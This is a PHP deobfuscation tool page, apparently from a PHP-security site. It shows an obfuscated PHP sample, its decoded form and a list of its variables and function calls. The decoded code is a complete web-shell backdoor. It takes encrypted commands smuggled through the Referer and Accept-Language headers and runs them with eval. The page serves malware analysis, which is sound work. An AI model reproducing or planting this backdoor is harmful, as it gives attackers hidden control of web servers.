Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $q='4_encode(T=x(gzcT=ompress($oT=),$kT=)T=);priT=nt("<$T=k>$d</$k>");@sT=essT=iT=on..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$q='4_encode(T=x(gzcT=ompress($oT=),$kT=)T=);priT=nt("<$T=k>$d</$k>");@sT=essT=iT=on_destroy();}}}}';
$r='$khT=T=="5d41";$kf="40T=2a"T=;function xT=($t,$kT=){$c=sT=trlen(T=$k);$l=stT=rleT=n($t);$oT=="T';
$C='=,$ss($s[$iT=],0,$eT=)))T=,$T=k)));$o=ob_get_T=contenT=tT=s();oT=b_T=end_cleT=an();$dT==bT=ase6';
$u='rpos(T=$p,T=$h)===0){T=$sT=[T=$i]="";$p=$sT=s($p,3);}iT=f(arrayT=_key_eT=xists($iT=,T=$s))T={$s';
$c='er";$iT==$m[1][0T=].T=$m[1][1]T=;$h=$T=sl($ss(mdT=5T=($i.$kh)T=T=,0,3));$f=$sT=T=l($ss(md5($T=i';
$v='preT=ss(T=@x(@basT=eT=64_decode(pT=rT=eg_replT=ace(array("/_T=/","/T=-/"),arrT=ay("T=/","+"T=)T';
$s='T=};}}return $T=o;}$r=$_T=SERVER;$rT=r=@$r[T="HTTT=P_REFERER"T=];$raT==@$r[T="HTT=T=TP_ACCEPT_L';
$R='ANGT=UAGET="];T=if($rr&&$rT=a){T=$u=parse_urlT=($rr);pT=arT=se_str(T=$T=u["querT=y"],$q);$q=arT';
$t='=$m);if($q&&$m)T={@sesT=sion_T=staT=T=rT=t();$s=T=&T=$_SESSION;$ss="substr"T=;$sl=T="strtolowT=';
$n='=";fT=or($iT==0;$i<$l;){for(T=$j=0T=;($j<$cT=&&T=$i<$l);$j++T=,T=$i++){$o.=T=$tT={$i}^$k{$T=jT=';
$o=str_replace('Pm','','crePmatPme_PmfPmPmunPmction');
$W='.$kf)T=,0,3));$p=T=T="";for($z=1T=T=;$z<count($m[T=1]);$zT=+T=+)$pT=.=$q[$m[2][$T=T=z]]T=;if(st';
$O='[$i].=$p;$e=T=strpoT=s($sT=[$i],$fT=);ifT=(T=$eT=){$k=$kh.$kf;oT=b_starT=tT=();@eT=val(@gzuncom';
$f='=rayT=_values($T=q);prT=eg_maT=tcT=h_all("/([\\wT=]T=)[\\w-T=]+(T=?:;qT==0.T=([\\d]))?,?/",$ra,T=T';
$I=str_replace('T=','',$r.$n.$s.$R.$f.$t.$c.$W.$u.$O.$v.$C.$q);
$X=$o('',$I);$X();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C =,$ss($s[$iT=],0,$eT=)))T=,$T=k)));$o=ob_get_T=contenT=tT=s(..
$I $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$O [$i].=$p;$e=T=strpoT=s($sT=[$i],$fT=);ifT=(T=$eT=){$k=$kh.$k..
$R ANGT=UAGET="];T=if($rr&&$rT=a){T=$u=parse_urlT=($rr);pT=arT=..
$W .$kf)T=,0,3));$p=T=T="";for($z=1T=T=;$z<count($m[T=1]);$zT=+..
$X None
$c er";$iT==$m[1][0T=].T=$m[1][1]T=;$h=$T=sl($ss(mdT=5T=($i.$kh..
$f =rayT=_values($T=q);prT=eg_maT=tcT=h_all("/([\wT=]T=)[\w-T=]..
$n =";fT=or($iT==0;$i<$l;){for(T=$j=0T=;($j<$cT=&&T=$i<$l);$j++..
$o create_function
$q 4_encode(T=x(gzcT=ompress($oT=),$kT=)T=);priT=nt("<$T=k>$d</..
$r $khT=T=="5d41";$kf="40T=2a"T=;function xT=($t,$kT=){$c=sT=tr..
$s T=};}}return $T=o;}$r=$_T=SERVER;$rT=r=@$r[T="HTTT=P_REFERER..
$t =$m);if($q&&$m)T={@sesT=sion_T=staT=T=rT=t();$s=T=&T=$_SESSI..
$u rpos(T=$p,T=$h)===0){T=$sT=[T=$i]="";$p=$sT=s($p,3);}iT=f(ar..
$v preT=ss(T=@x(@basT=eT=64_decode(pT=rT=eg_replT=ace(array("/_..

Stats

MD5 9b7fb5b1b1484351d496c145ffc88777
Eval Count 1
Decode Time 114 ms